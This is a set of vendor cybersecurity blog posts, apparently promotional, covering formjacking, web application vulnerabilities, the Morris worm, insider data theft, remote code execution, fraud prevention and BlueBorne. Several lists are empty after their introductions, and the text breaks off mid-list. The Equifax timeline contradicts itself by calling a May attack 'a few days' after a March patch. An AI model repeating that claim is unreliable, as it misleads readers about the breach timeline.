Cybersecurity Blog
Thought leadership. Threat analysis. Cybersecurity news and alerts.
Why is Segregation of Duties Between IT and Cybersecurity Critical for Your Business?Neglecting your cybersecurity means neglecting your business’s future. It’s that simple. Every company has to take effective action to minimize its risk of a data breach, leveraging the latest, most effective measures to combat hackers. Software specialists Citrix is just one of the latest brands to come under attack: it’s believed as much as 10TB may have been stolen. Furthermore, the criminals are said to have gained access to the system through ‘password spraying’, or simply guessing weak, common passwords. It’s paramount to ensure your business is protected and prepared to deal with any serious cyberattack sent your way. One key aspect of safeguarding your company is Segregation of Duties between IT and cybersecurity. What does that mean and how do you do it? SoD DefinedSegregation of Duties (or SoD) revolves around keeping multiple people involved with achieving a specific goal, whatever the task at hand may be. Though it started as a process to minimize the danger of mistakes or fraudulent activities, SoD has evolved into an important security issue. All tasks covered require authorization from two parties to prove integrity and defend against breaches. All individuals involved in undertaking a process of any size would have to be in agreement before the task can be completed. Segregation of Duties is so important because it takes absolute power out of the hands of any one person within your company, offering greater peace of mind and caution. SoD spreads the privileges for everyone’s benefit and makes cybercriminals’ ‘work’ a little harder Key Benefits of Segregation of DutiesSegregation of Duties offers businesses numerous compelling benefits, including the following: Reduce the risk of inside attacksYou trust your employees to work with your system every day. You expect them to be respectful, careful and loyal. You put your faith in them to help steer your company toward success. And yet, inside attacks are a sad reality of cybersecurity breaches. Not only can an issue caused from the inside be more difficult to detect until it’s too late, but it can be particularly devastating on an emotional level if the attack was intentional. Dealing with a mistake is one thing. But knowing that an employee you paid and supported facilitated an attack can leave you, and their colleagues, struggling to trust others in the future. Oversights may cause accidental inside attacks too. This may be down to an employee downloading an attachment from a suspicious email, failing to follow standard practice when making company payments or something equally minor. Segregation of Duties takes care of all this. For example, if one worker is preparing to download a new tool but requires another’s agreement first, they may discover a security risk before any harm is done. This reduces the danger of genuine accidents caused by ignorance and acts as a deterrent for insiders looking to sabotage the business. Should any attacks take place, it’s far easier to determine which party must have been responsible just by addressing those individuals with access. This is much more difficult when everyone in the company uses every aspect of the system without restraint. Less power is up for grabsImagine if a hacker manages to gain access to your system by cracking an employee’s login details. Imagine if said employee has full access to every tool, every database, every service — a criminal could basically take control of your business and cause monumental damage before they’re shut down. With Segregation of Duties, you can minimize the power any hacker would wield should they find a way into your network. Accounts are shared between a small group of people and only they have authorized entry. Any sign of unexpected activity within those accounts would indicate a potential issue. Furthermore, all aspects of your company which require a different set of credentials to enter would be secure. This allows you to focus your attention on the problem areas rather than addressing the entire company. Accounts and credentials are easier to manageBusinesses implementing SoD can manage access and credentials more easily in the event of a crisis. Specifically, creating new logins for a compromised account is much easier with just two people to update. It’s a convenient, faster process with less room for error. Segregation of Duties Between IT and CybersecuritySegregation of Duties between your IT department and cybersecurity specialists is vital for increasing your reinforcing business’s defense against hackers. Your IT team may be experienced, well-trained and qualified, but they have to make sure they’re up-to-date on the latest risks, techniques and solutions in cybersecurity. Without this knowledge, they’re more likely to make mistakes when updating systems, maintaining your network or working with vendors. Again, SoD means making sure your IT specialists are accountable and have to run their intentions by someone else. The smallest oversight could end up causing massive disruptions and effectively shut your business down on a temporary (or possibly permanent) basis. Segregation of Duties demands a responsible approach: keep track of which individuals have access to specific accounts and which are authorized to perform certain tasks. Make sure to limit any crossover that could cause problems, such as putting the same person in two or three teams. This may lead to a conflict of interest and questionable choices. Working with experienced cybersecurity experts is crucial for companies of all sizes, across all industries. Businesses have to take charge of their own protection and implement strategies designed to limit the damage a single attack is capable of. All companies must stay organized and plan ahead when implementing a SoD strategy. Cybersecurity professionals can advise you on the major threats your business faces and how best to protect against them. Cybersecurity experts will help you understand what that involves, how to implement Segregation of Duties and combat even the most creative cybercriminals. Want to learn what The Driz Group can do for your company? Please don’t hesitate to reach out to our dedicated teamnow. Trend Shows Cybercriminals Are Turning to FormjackingA newly released global cyberthreat trend shows that cybercriminals are turning to formjacking as a new get-rich-quick scheme. In the recently released Internet Security Threat Report, Symantec reported that on average, more than 4,800 unique websites are compromised with formjacking every month. According to Symantec, formjacking has increased dramatically since mid-August 2018. By the end of 2018, Symantec said it detected 3.7 million formjacking attacks, with nearly a third of all detections occurring during November and December – the busiest online shopping period. Symantec said that while any organization, regardless of size and location, which processes payments online is a potential victim of formjacking, small and medium-sized retailers are, by and large, the most widely compromised by formjacking attackers. What Is Formjacking?Formjacking is a type of cyberattack that injects malicious code into website forms. This malicious code allows attackers to steal credit card details and other personal and financial information that are entered into the compromised forms as information is automatically sent to attackers. Stolen information could be used by attackers to perform payment card fraud or attackers could sell these details to other cybercriminals. According to Symantec, attackers need only 10 stolen credit cards from each of the more than 4,800 compromised websites each month to earn up to $2.2 million per month considering that the current value for each card is $45 in underground selling forums. How Are Formjacking Attacks Carried Out?In recent months, two methods of formjacking attacks were observed: supply chain attack and redirection chain. Supply Chain AttackOne of the ways by which formjacking attackers gain access to a website and change the code on its checkout page is through supply chain attack. In a supply chain attack, attackers gain access to a large organization’s website and change the code on its checkout page by exploiting the security vulnerabilities in a smaller business used by the larger company to provide different services. The Ticketmaster formjacking case is an example of a formjacking attack carried out by means of a supply chain attack. In the Ticketmaster case, attackers injected malicious code into Ticketmaster’s checkout pages after compromising a chatbot used by Ticketmaster for customer support. This malicious code enabled the Ticketmaster attackers to capture payment card data and other information from customers and send them to their servers. The chatbot used by Ticketmaster for customer support was hosted by Inbenta, an external third-party supplier to Ticketmaster. Inbenta chief executive Jordi Torras toldZDNetthat attackers exploited a number of vulnerabilities of Inbenta’s servers and in the process altered the chatbot code. "It has been confirmed that the source of the data breach was a single piece of JavaScript code, that was customized by Inbenta to meet Ticketmaster's particular requirements," Jordi Torras said. "The JavaScript we created specifically for Ticketmaster was used on a payments page, which is not what we built it for. Had we known that script would have been used in that way, we would have advised against it, as it poses a security threat." The Ticketmaster formjacking case, therefore, wasn’t directly an attack against Ticketmaster but an attack on a third-party supplier Inbenta. It’s worthy to note that supply chain attack was also used in the NotPetya attack in 2017 in which MEDoc, a tax and accounting software package, was used for the initial insertion of NotPetya malware into corporate networks. Supply chain attacks show that cybersecurity hygiene shouldn’t only be implemented within an organization’s internal IT systems but also for third-party software and applications. Redirection ChainRedirection chain as a means of carrying out a formjacking attack is a new technique used by attackers in late 2018. In a redirection chain attack, a user that uses a checkout page of an online retailer is redirected to the checkout page of another online retailer which is injected with formjacking code. When this user enters payment information, the information is sent both to the retailer as well as to the attackers. In December 2018, Symantecreported that it detected a checkout page of a retail store in Paris which was injected with a formjacking code. The injected formjacking code, Symantec said, collects the payment information entered by customers and posts it to the domain google-analyitics.org. Symantec observed that popular online retailers’ checkout pages from different countries, such as the U.S., Japan, Australia, and Germany redirected to this one Paris checkout page. “This created an interesting redirection chain as customers of all these websites were being infected by formjacking at the same time,” Symantec said. Symantec added that to make matters worse, the formjacking code in the above-mentioned redirection chain attack comes with Firebug, a debugging tool that prevents security researchers from analyzing the malicious code. PreventionFormjacking attacks are becoming sophisticated and stealthy as shown in the above-mentioned examples. Users of compromised checkout pages may not realize they’re victims of formjacking as compromised checkout pages generally continue to operate as normal. Here are some cybersecurity measures in order to prevent formjacking attacks:
Don’t have cybersecurity resources or dedicated CISO? Contact us today to mitigate IT risks, fast. 3 Most Common Web Application Security VulnerabilitiesAlmost all organizations today have an online presence, mostly in the form of an official website. While these websites open a window of opportunities for organizations, these same websites are at times a bane to organizations as these are becoming attractive targets for cyber attackers. What Are Web Application Security Vulnerabilities?One of the ways by which cyber attackers wreak havoc on corporate websites is by exploiting the security vulnerabilities in web applications. Web applications, also known as web apps, refer to software programs that run in a web browser. A web application can be as simple as a contact form on a website or a content management system like WordPress. Web application security vulnerabilities, meanwhile, refers to system flaw or security weakness in a web application. Web applications are gateways to a trove of data that cyber attackers find attractive and easy to steal. Every time website visitors sign up for an account, enter their credentials or make a purchase via an official corporate website, all this data, including personally identifiable information, is stored on a server that sits behind that web application. Exploiting a security vulnerability in a web application allows attackers to access the data stored on that server. Imperva, in its “State of Web Application Vulnerabilities in 2018”, reported that the overall number of new web application vulnerabilities in 2018 increased by 23%, that is, 17,308 web application vulnerabilities, compared to 2017 with only 14,082 web application vulnerabilities. Most Common Web Application Security VulnerabilitiesHere are the 3 most common security vulnerabilities affecting web applications: 1. InjectionsBased on Imperva’s data, the number one web application vulnerability in 2018 was injection, representing 19% of the web application vulnerabilities last year. In an injection attack, an attacker inserts or injects code into the original code of a web application, which alters the course of execution of the web app. According to Imperva, the preferred method of attackers last year to inject code into web applications was remote command execution (RCE) with 1,980 vulnerabilities. Remote command execution allows an attacker to remotely take over the server that sits behind a web application by injecting an arbitrary malicious code on the web app. The Equifax data breach that exposed highly sensitive data of millions of U.S. customers, as well as thousands of U.K. and Canadian consumers, is an example of a cyberattack that used the injection method, in particular, remote command execution. Attackers gained access to the data of millions of Equifax’ customers by exploiting the vulnerability designated as CVE-2017-5638in the web application used by the company. At the time of the attack, Equifax then used an outdated Apache Struts, a popular open source framework for creating enterprise-grade web applications. Despite the advisory from the Apache Software Foundation, the organization that oversees leading open source projects, including Apache Struts, to update the software to the latest version, Equifax failed to do so, leading the attackers to breach the sensitive data of millions of the company’s customers. On March 7, 2017, the Apache Software Foundation issued a patch or security update for CVE-2017-5638 vulnerability. On May 13, 2017, just a few days after the CVE-2017-5638 patch was released, attackers started their 76-day long cyberattack on Equifax, this according to the findings of the U.S. House Oversight Committee. 2. Cross-Site ScriptingThe second most common web application vulnerability is cross-site scripting. According to Imperva, cross-site scripting ranked as the second most common vulnerability in 2018, representing 14% of the web application vulnerabilities last year. Cross-site scripting, also known as XSS, is a type of injection in which malicious code is inserted into a vulnerable web application. Unlike injection in general, cross-site scripting particularly targets web visitors. In a cross-site scripting attack scenario, an attacker, for instance, embeds an HTML tag in an e-commerce website’s comments section, making the embedded tag a permanent fixture of a webpage, causing the browser to read the embedded tag together with the rest of the original code every time the page is opened, regardless of the fact that some site visitors don’t scroll down to the comments section. The injected HTML tag in the comments section could activate a file, which is hosted on another site, allowing the attacker to steal visitors’ session cookies – information that web visitors have inputted into the site. With the stolen session cookies of site visitors, attackers could gain access to the visitors’ personal information and credit card data. 3. Vulnerabilities in Content Management SystemsImperva’s State of Web Application Vulnerabilities in 2018 also showed attackers are focusing their attention to vulnerabilities in content management systems, in particular, WordPress. Attackers are focusing their attention on WordPress as this content management system powers nearly one-third of the world’s website. Data from W3Techsshowed that as of late December, last year, WordPress usage account for 32.9% of the world’s websites, followed by Joomla and Drupal. According to Imperva, the number of WordPress vulnerabilities increased in 2018 despite the slowed growth in new plugins. Imperva registered 542 WordPress vulnerabilities in 2018, the highest among the content management systems. The WordPressofficial website, meanwhile, reported that only 1,914 or 3% from the total 55,271 plugins were added in 2018. Ninety-eight percent of WordPress vulnerabilities are related to plugins, Imperva reported. Plugins expand the features and functionalities of a website. WordPress plugins are, however, prone to vulnerabilities as with this content management system (being an open source software), anyone can create a plugin and publish it without security auditing to ensure that the plugins adhere to minimum security standards. Web Application Attack PreventionA web application firewall (WAF) is one of the best cybersecurity solutions that your organization can employ against web application vulnerabilities. Trust the experienced team that protects hundreds of sites and applications. Protect your web application within 10-minutes and keep cybercriminals at bay. Get started today! Look Back into the First Major Cyberattack: The Morris WormThirty years ago, the Morris worm, dubbed as the first major cyberattack, was unleashed into the wild, crashing or slowing to a crawl 10% or 6,000 of the 60,000 computers then connected to the “Internet”. What Is Morris Worm?Morris worm is named after its creator Robert Tappan Morris. A worm, meanwhile, refers to a type of malicious software (malware) that has the ability to spread itself within networks without user interaction. Courtdocuments showed that Morris, then a first-year graduate student at Cornell University's computer science Ph.D. program, released the worm on November 2, 1988 through a computer at the Massachusetts Institute of Technology (MIT), which Morris hacked using a Cornell University's computer. Morris worm was released into the wild a year before the world wide web came into existence. The term “Internet” then referred to a U.S. computer network, composed of connected computers from prestigious colleges, research centers, governmental and military agencies. In less than 24 hours on November 2, 1988, Morris worm infected the computers of institutions, including Harvard, Princeton, Stanford, Johns Hopkins, National Aeronautics and Space Administration (NASA) and the Lawrence Livermore National Laboratory. While the worm didn’t destroy or damage files, infected computers slowed to a crawl or ceased functioning and emails were delayed for days. The estimated cost of dealing with the Morris worm at each installation ranged from $200 to over $53,000. The worm infected computers running a specific version of the Unix operating system in 4 ways: First, via a security vulnerability in “SEND MAIL”, a computer program that transfers and receives electronic mail; Second, via a security vulnerability in the "finger demon", a computer program that allows extraction of limited information about the users of another computer; Third, via "trusted hosts" feature that allows a user with certain privileges on one computer to have equivalent privileges on another computer without using a password; and Fourth, via a program that guesses passwords using various combinations of letters tried out in rapid succession, hoping that one will be an authorized user's password. When the correct password is entered, the intruder is allowed whatever level of activity that the user is authorized to perform. Morris designed the worm to stay hidden. The worm was designed in such a way that it won’t copy itself onto a computer that already had a copy. The worm was also designed in such a way that it would be killed when a computer was shut down. Consequences of the Morris WormFor unleashing the worm into the wild, Morris became the first person convicted for violating the U.S. Computer Fraud and Abuse Act, which outlaws unauthorized access to protected computers. He was sentenced to 3 years of probation, 400 hours of community service, a fine of $10,050 and the costs of his supervision. The first major cyberattack perpetrated by the Morris worm showed how vulnerable interconnected computers had become. Just days after the Morris worm attack, the U.S. Government created the country’s first computer emergency response team under the direction of the Department of Defense. Developers also began creating intrusion detection software. On the flip side, the Morris worm inspired a new breed of malicious hackers, plaguing the digital age. In recent memory, the worm that resembles the devastation caused by Morris worm is the WannaCry worm, commonly known as WannaCry ransomware. In less than 24 hours on May 12, 2017, more than 300,000 computers in 150 countries were infected by WannaCry, each demanding a ransom payment. WannaCry is categorized as a worm as similar to the Morris worm as it has the ability to spread itself within networks without user interaction. WannaCry specifically exploited the security vulnerability in Server Message Block Protocol (SMB protocol) in some versions of Microsoft Windows. SMB protocol allows users to access files, printers and other resources on a network. PreventionHere are some cybersecurity measures to protect your organization’s computers or networks from worms similar to WannaCry and Morris worms: Implement Network SegmentationIn network segmentation, vital computers that housed critical information and operations are separated or disconnected from computers connected to vulnerable systems like the public internet. Network segmentation ensures that when internet-facing computers are infected by a worm, these vital computers aren’t affected. Keep All Software Up-to-DateMake sure that software security updates are installed as timely as possible, not months or years after the release dates of the security updates. Cyberattackers have automated the process of scanning the internet for finding vulnerable computers – those that fail to install security updates. This was the case for WannaCry victims as they failed to install the security update issued by Microsoft months before the WannaCry cyberattack. Refrain from Using Legacy Hardware and SoftwareThe term “legacy” refers to old and outdated computer hardware or software. Similar to computers that fail to timely install security updates, legacy hardware and software programs are similarly targetted by cyberattackers as these legacy hardware and software programs no longer receive security update from their vendors. Some versions of the Microsoft Windows (Windows XP, Windows 8, and Windows Server 2003 operating systems) were targeted by WannaCry attackers as well as during the attack these software programs were no longer supported by Microsoft. A day after the WannaCry attack, however, Microsoft released security updates for Windows XP, Windows 8, and Windows Server 2003. Protecting computers or networks from worms and other malicious software is important in order to prevent data breaches. Under Canada’s Digital Privacy Act, starting November 1 this year, private organizations are mandated to notify the Privacy Commissioner of Canada and the affected individual “as soon as feasible” in the event that a data breach poses a “real risk of significant harm” to any individual. When you need help assessing and mitigating the cybersecurity risks, contact out team of expertsand minimize the likelihood of a data breach. How to Prevent Departing Employees from Departing with Your Organization’s Data
The practice of departing employees departing with their employers’ data has recently been highlighted in the latest case that sprung from one of the biggest tech companies Apple.
A special agent at the Federal Bureau of Investigation (FBI) recently filed a criminal complaint before the US District Court for the Northern District of California against a former Apple employee, alleging that the former Apple employee who worked as a hardware engineer on the company’s autonomous vehicle development team stole trade secrets from the company. According to the FBI special agent, because of the former employee's role on Apple’s autonomous vehicle development project, he was granted broad access to secure and confidential internal databases containing trade secrets and intellectual property for the project. After returning from a paternity leave, the said employee, according to the FBI special agent, resigned saying that he plans to move back to his home country and he also plans to work with another company also working in the field of autonomous vehicle technology. The said employee turned over all Apple-owned devices and Apple's security then disabled his remote network access, badge privileges, network access and other employee accesses. The criminal complaint revealed that data from Apple’s security team showed that days prior to his resignation, the former Apple employee’s network activity increased exponentially compared to the prior two years of his employment. On the evening two days prior to his resignation, the employee was shown via CCTV footage entering the autonomous vehicle software and hardware labs and leaving the building less than an hour later carrying a large box. The criminal complaint also disclosed that in an interview with Apple security attorney and Apple employee relations representative, the accused former employee of Apple admitted downloading data to a non-Apple device, one that's owned by his wife, because he has "interest in platforms and wanted to study the data on his own." The accused also admitted to FBI agents of taking files from Apple’s autonomous vehicle development project and transferring the files to a non-Apple digital device, owned by his wife. Files recovered from the non-Apple device included a 25-page document containing schematics for one of the circuit boards that form Apple's proprietary infrastructure technology for its autonomous vehicle development project. FBI agents arrested the said Apple's former employee at the San Jose International Airport as he was about to leave the country. Prevalence of Departing Employees Stealing or Leaking Corporate Data
The case filed against a former Apple employee is just one of the many cases of departing employees departing with their employers’ data.
In 2014, a Federal Court of Australia found sufficient evidence that a former employee of Leica Geosystems Pty Ltd copied 190,000 files from the company’s computers the day before he resigned. The files copied by the former employee included numerous source codes representing the core of the company’s intellectual property. The Federal Court of Australia ordered the said employee to pay AUD$50,000 to his former employer as fine for his misconduct. In 2015, an employee of BlueScope, after learning she was to be terminated, downloaded 40 gigabytes of company documents. The company filed legal actions in the Federal Court of Australia and Singapore to stop the information falling into the hands of its competitors. BlueScope and the former employee reached a confidential settlement. The Federal Court of Australia, meanwhile, permanently restrained the BlueScope’s former employee from using the data that’s in her possession. A survey conducted by Biscom showed the prevalence of departing employees departing with their employers’ data. The Biscom survey showed the following alarming findings:
Data Leak Prevention1. Limit Employee Access to DataOnly give employees access to data needed to get their jobs done. For instance, engineers don’t need access to CRM systems. 2. Encrypt Critical Corporate DataEnsure that critical corporate data, whether data is in-transit, at-rest and in-use, must be encrypted. Encryption ensures that even when there’s data breach, the data will remain useless. 3. Establish Regular IT AuditsWhile automated, preventative controls are the best defense, no technology is perfect. Establishing regular IT audits performed by an independent third-party will help you detect any outliers and detect data leaks and internal fraud early on. Such audits generally include 4. Require Appropriate Authentication for Critical ContentAccessing critical content must require not just a username and password but also multi-factor authentication. When critical content is being accessed, it also helps that approval must be secured first or an alert must be given to a compliance officer. 5. Regularly Monitor Network ActivitiesUnusual volume of downloaded data and non-office hours data access are examples of network activities that should be monitored. Said network activities are red flags for unauthorized activities and should be checked. 6. Keep Critical Data OfflineDon't store information vital to your organization, especially trade secrets, on any device that connects to the internet. 7. In-Person Data Security and Privacy TrainingOne of the means, though not a cure-all approach, of preventing departing employees from stealing corporate data is by providing an in-person data security training the moment the employee is hired. One training session isn't enough. It's best to regularly remind employees about safeguarding company’s data by implementing a regular, formal cybersecurity awareness training. In addition to the in-person data security and privacy training, a confidentially or non-disclosure provision has to be included in the employment contracts. 8. Don’t Give Employees Administrator PrivilegesDon’t give employees administrator rights for the company-supplied computers or devices. Giving them administrator privileges allows them to install malicious software (malware) that could lead to unauthorized access to information vital to your organization.
When you need help with either establishing regular IT Audits or performing data leakage assessments, help is a phone call away. Contact us today and protect your business.
What is Remote Code Execution Attack & How to Prevent this Type of CyberattackMicrosoft recently rolled out its latest security update, fixing 50 security vulnerabilities. Out of the 50 security vulnerabilities fixed by Microsoft in its June 12thsecurity update, 14 security vulnerabilities allow remote code execution. What is Remote Code Execution?Remote code execution (RCE) refers to the ability of a cyberattacker to access and make changes to a computer owned by another, without authority and regardless of where the computer is geographically located. RCE allows an attacker to take over a computer or a server by running arbitrary malicious software (malware). "RCE (remote code execution) vulnerabilities are one of the most dangerous of its kind as attackers may execute malicious code in the vulnerable server," Impervasaid. Remote Code Execution Example #1: Microsoft Excel Remote Code Execution VulnerabilityOne example of a remote code execution vulnerability is the CVE-2018-8248vulnerability – one of the security vulnerabilities fixed by Microsoft in its June 12thsecurity update. The CVE-2018-8248 vulnerability, also known as “Microsoft Excel Remote Code Execution Vulnerability”, allows an attacker to run a malware on the vulnerable computer. The CVE-2018-8248 attacker could take full control of the compromised computer if the owner of the compromised computer logs on to the computer with administrative user rights. In taking full control of the compromised computer, the attacker could view, change or delete data; install programs; or create new accounts with full user rights. According to Microsoft, the delivery method in exploiting the CVE-2018-8248 vulnerability could be in the form of a malicious email with an attachment that contains a specially crafted file with an infected version of Microsoft Excel. Another delivery method in exploiting the CVE-2018-8248 vulnerability is in the form of a web-based attack scenario, whereby an attacker could host a website or compromised website that accepts or hosts user-provided content containing a specially crafted file designed to exploit the CVE-2018-8248 vulnerability. In the 2 scenarios, malicious email and web-based attack, the attacker has to convince users to click on the attachment or a link to open the specially crafted file. To date, there’s no report that CVE-2018-8248 vulnerability has been exploited into the wild. Remote Code Execution Example #2: Microsoft Windows SMB VulnerabilityOn May 12, 2017, hundreds of thousands of computers worldwide were infected by WannaCry, a malware that encrypts computer files, locking out computer users and asks for ransom payment to decrypt or unlock the computer files. WannaCry, as it turns out, is a malware that allows remote code execution if an attacker sends specially crafted messages to a Microsoft Server Message Block (SMB) – a protocol used for sharing access to files, printers and other resources on a network. Unlike other remote code execution attacks which leverage on malicious emails and web-based attacks as delivery methods, WannaCry’s delivery method was scanning the internet for vulnerable SMB ports and using one of the alleged U.S. National Security Agency (NSA) spying tools called “EternalBlue”, which takes advantage of the vulnerability in Microsoft’s SMB. Once an attacker detects SMB vulnerability, the DoublePulsar (another alleged NSA spying tool) is then used by an attacker to allow for the installation of the WannaCry malware. EternalBlue and DoublePulsar are 2 of the spying tools allegedly used by the NSA that were leaked in April 2017 by a group of hackers who called themselves Shadow Brokers. According to Microsoft, the security vulnerabilities exposed by Shadow Brokers were fixed by the security update released by the company in March 2017 – a month before Shadow Brokers publicly released the alleged NSA spying tools. Researchers at Renditionreported that in late April and the first few days of May 2017 – several days after Microsoft issued a security update fixing the security vulnerabilities exposed by Shadow Brokers, more than 148,000 computers were compromised by EternalBlue and DoublePulsar. Hundreds of thousands of computers were infected by WannaCry as many compromised machines were used as servers and because of the worm or self-propagating capability of this malware. As a result, computers connected to the infected servers were also infected by the WannaCry malware. Remote Code Execution Attacks and Cryptocurrency MiningAt the height of the cryptocurrency boom in December 2017, Imperva reported that cryptocurrency mining drove almost 90% of all remote code execution attacks. Imperva said 88% of all remote code execution attacks in December 2017 sent a request to an external source to try to download a cryptocurrency mining malware. “These attacks try to exploit vulnerabilities in the web application source code, mainly remote code execution vulnerabilities, in order to download and run different crypto-mining malware on the infected server,” Imperva said. “The malware usually uses all CPU computing power, preventing the CPU from doing other tasks and effectively denies service to the application’s users.” PreventionTimely patching or timely installation of software update ranks as the top cybersecurity measure in preventing remote code execution attacks. For instance, to prevent remote code execution via CVE-2018-8248 vulnerability, Microsoft’s June 12, 2018 security update has to be installed. In the case of WannaCry cyberattack, remote code execution via the exploitation of Microsoft Windows SMB vulnerability could have been prevented if only Microsoft’s March 2017 security update had been timely applied. To prevent attackers trying to infect vulnerable servers with cryptocurrency mining malware, the initial attack must be blocked. As an initial attack, cybercriminals typically exploit remote code execution vulnerabilities to launch their malware, similar to what WannaCry attackers did. If your organization is using computers or servers that are known to be using software that’s vulnerable to remote code execution, the latest vendor patch to mitigate this particular cyberattack should be timely applied. As a rule of thumb, to significantly minimize the risk, your company must collect, analyze and act on the most recent threat intelligence. Your IT team must be equipped with the best tool to apply patches timely thus mitigating the risk of a data breach. Better yet, workstation and server patching can and should be automated to prevent remote code execution and other cyberattacks. Call us todayor send an emailto speak with our security experts about processes and technology to help your organization mitigate IT and cybersecurity risks. Are You Failing to Protect Yourself Against Fraud?Online fraud is, sadly, a common danger.More than 15 million people fell victim to it in 2016, and the risk is still very much present. Companies across all areas of industry must take steps to protect their finances, making any changes necessary to minimize threats. Some of these may seem simple, while others appear a tad more complicated. As specialists in cybersecurity, we’re dedicated to helping businesses like yours stay safe against ever-more sophisticated tactics. So, what changes can you make to your everyday operations to combat online fraud? You Ignore the Warning SignsSeeing new customers make large purchases can be an exciting time, but you need to be aware of some common warning signs. Orders placed late at night could be a red flag, while large orders of products that can be resold easily are another fraud giveaway to watch out for. Another red flag? Multiple attempts to buy an expensive item (or items) with the same payment method, but with minor differences in the expiration date or name. Purchases made by buyers who have been repeat customers for a long time should be watched if they make an unusual change in their purchases, address, contact details, and order size. Last but not least: be wary of customers buying goods with a domestic billing address but sending the purchases to international locations. This is especially true if multiple international addresses are used. You Don’t Invest in the Best SecurityIn our experience, too many businesses – both big and small – invest too little into their cybersecurity. Even though businesses are expected to spend more than $100bn on online protectionin 2020, it’s still not uncommon to see companies letting themselves down. It’s easy to assume you can handle your business’s online security when you first enter the market. After all, download some anti-virus software, get yourself a firewall – job done, right? Sadly, it’s not so simple. Finding the budget for high-quality security protocols can be difficult, but it’s vital – you’re reinforcing your company’s infrastructure, protecting your assets, and minimizing further expense. In other words: take the danger of online fraud seriously. Your customers and your employees are depending on you to keep their details, their salaries, and safer. You Haven’t Educated Your TeamYour workforce has to be educated on the signs of online fraud, trained in criminals’ latest tactics and the techniques available to combat them. After all, they’re the people keeping your operations running day in, day out. They’re handling customers’ purchases, processing transactions, communicating with buyers, using your databases, downloading resources, and more. Uninformed staff may end up making mistakes that leave your business vulnerable, facing fraudulent activity, and ultimately at risk. When they have the information and the training, they can actually be a much-needed defense against cyber criminals preying on companies like yours. Make sure you host regular meetings to train your employees on the cyber-security threats they are likely to encounter, and the warning signs they should watch out for. This doesn’t have to be at an expert level, as you don’t want to overwhelm or confuse them, but it should be enough to give them the confidence they need to perform at their best. Your staff should know enough to identify possible fraudulent behavior, handle customers’ personal information properly, and avoid leaving your business exposed. You Haven’t Implemented a Reliable Password PolicyPasswords have to be strong, hard to guess, and varied. Make sure your employees and your customers have the information and advice they need to avoid weak passwords. We all have so many passwords to remember today. Many of us run numerous different aspects of our lives online, relying on online banking, online shopping, online communications … it’s easy to be complacent. However, complacency leads you to use the same passwords again and again. Your customers may simply create an account and make purchases with your business, but inadvertently let someone else know what their password is. This could lead to fraudulent purchases, and the customer might blame your company for failing to offer them sufficient advice on how to best create efficient passwords. It’s vital, then, to provide helpful information at the sign-up stage, and a dedicated page on your site. Make sure they know not to use something simple and easy to find out, such as their child’s name or their birthday. Varying letter case, adding symbols and numbers, and combining words to make longer passwords can all be a big help. Your employees should follow the same strategy. Using the same password in their work emails or accounts as their personal ones can make increase your business’s vulnerability. You Don’t Run Background Checks on Your EmployeesHiring employees with a history of criminal activity or suspicious behavior in previous roles (leading to dismissals) can be an easy way to expose your business to fraud. Running background checks may seem to be something of a hassle, but it’s well worth doing to protect your company. This should consist of criminal background checks, their education, and their past employment – you will have the information to identify who you have working for you. Trust goes a long, long way in maintaining an efficient, satisfied workforce. If you know your team is unlikely to undertake fraudulent activity and put your company’s and your customers’ data at risk, you can focus on combating external dangers instead. Employees will generally accept that these background checks are par for the course. Though it might seem intrusive, it’s for the good of your company, your clients, and your reputation. Online fraud is an intimidating area and makes businesses of all sizes feel vulnerable. Taking the steps explored above is an effective start to a stronger infrastructure, but you should trust the professionals to reinforce (and maintain) your business’s cybersecurity program for maximum protection against threats. Contact ustoday to assess your risks and protect your business. Top 7 Cyber Security Tools for Your BusinessWith so much of our information online, everyone is vulnerable to hackers and cyber-thieves. When it comes to business, a cyber invasion is a constant threat. Short term loss could be financial, intellectual property theft, data loss, or worse. The real threat is the long term loss of trust and reputation damage that could take years to repair. If your clients' information is exposed, it will be hard for them to consider it safe to give you their business again. Protect your business with these 7 cyber security tools. 7 Cyber Security Tools Your Business Must Be UsingIn order to protect your business' digital information, you need a variety of cyber security tools in place. For complete peace of mind, you'll want to work with a trusted cyber security partner. In the mean time, these tools are a great place to start. 1. Malware ScannersMalware is short for malicious software. It is designed by hackers to gain access to a computer without the owner's knowledge. You must have specific anti-malware cyber security tools in place to detect any hacker invasion. There are a variety of malware scanners out there, many even available for free (with limited features). Protect your business with automatic malware scanners in place. 2. Routine PatchingPatching is the process of installing a piece of software that repairs any security flaws. Updating an app is an example of patching. Picture your business's digital infrastructure as a house. Each time you add a new application, piece of software, etc. it's like adding a new room to the house. Software, apps, and the like are built by humans, meaning that there is room for human error. Human error is like an unlocked door or unfinished window in one of the new rooms. This can leave a welcome mat out to cyber attackers. That's why your security plan needs to include routine assessments and patching. 3. Two-Factor AuthenticationUse two-factor authentication to add a difficult-to-hack layer of security to your log in systems. Examples include a verification code sent to a linked phone number or a piece of information only the user would know. 4. Restrictive Administrative AccessAdd an additional security level for your most sensitive information and infrastructure by restricting who can access it. Click here for more information on how to implement restrictive admin mode. 5. Network SegmentationDivide your computer network into sub networks to improve security and performance. This allows you to isolate the most sensitive data to a specific network to limit access and decrease congestion. 6. Vulnerability ScanningThere's no better way to access your security levels than a vulnerability scan. Try our free vulnerability assessment to find weaknesses in your code and how to remedy them. 7. 24/7 Security MonitoringCyber security protection doesn't come in the form of a quick fix. Continually protect your business' data with a 24/7 security monitoring system in place to catch attacks the minute they happen. Protect Your Business for Peace of MindCyber security tools are of the utmost importance for businesses and individuals alike. Questions? Let us know if there is anything we can help you with. Our emergency response team is available 24/7 if you're currently dealing with a cyber attack. Contact us today.
New Bluetooth Malware Puts Billions of Devices at Risk
A new malicious software dubbed as “BlueBorne” puts billions of Bluetooth-enabled devices at risk.
Understanding Bluetooth
Dr. Jaap Haartsen invented the Bluetooth while working at Ericsson in the 1990s. Bluetooth was named after the 10th-century king of Denmark King Harald Blåtand (blue-tooth in English), who famously united Scandinavia. Just as King Bluetooth united Scandinavia, Dr. Haartsen’s invention unites or connects devices.
Bluetooth is currently the most widely-used protocol for short-range communications. It's used in a wide range of devices, from personal computers to smart phones, consumer electronics devices (smart TVs, printers), medical and health devices, home automation and autonomous cars. Bluetooth is now licensed, managed and maintained by the Bluetooth Special Interests Group (SIG). Tech giants Google, Microsoft, Apple, Intel and IBM are some of the group members. How BlueBorne Works
1. BlueBorne attacks devices via Bluetooth.
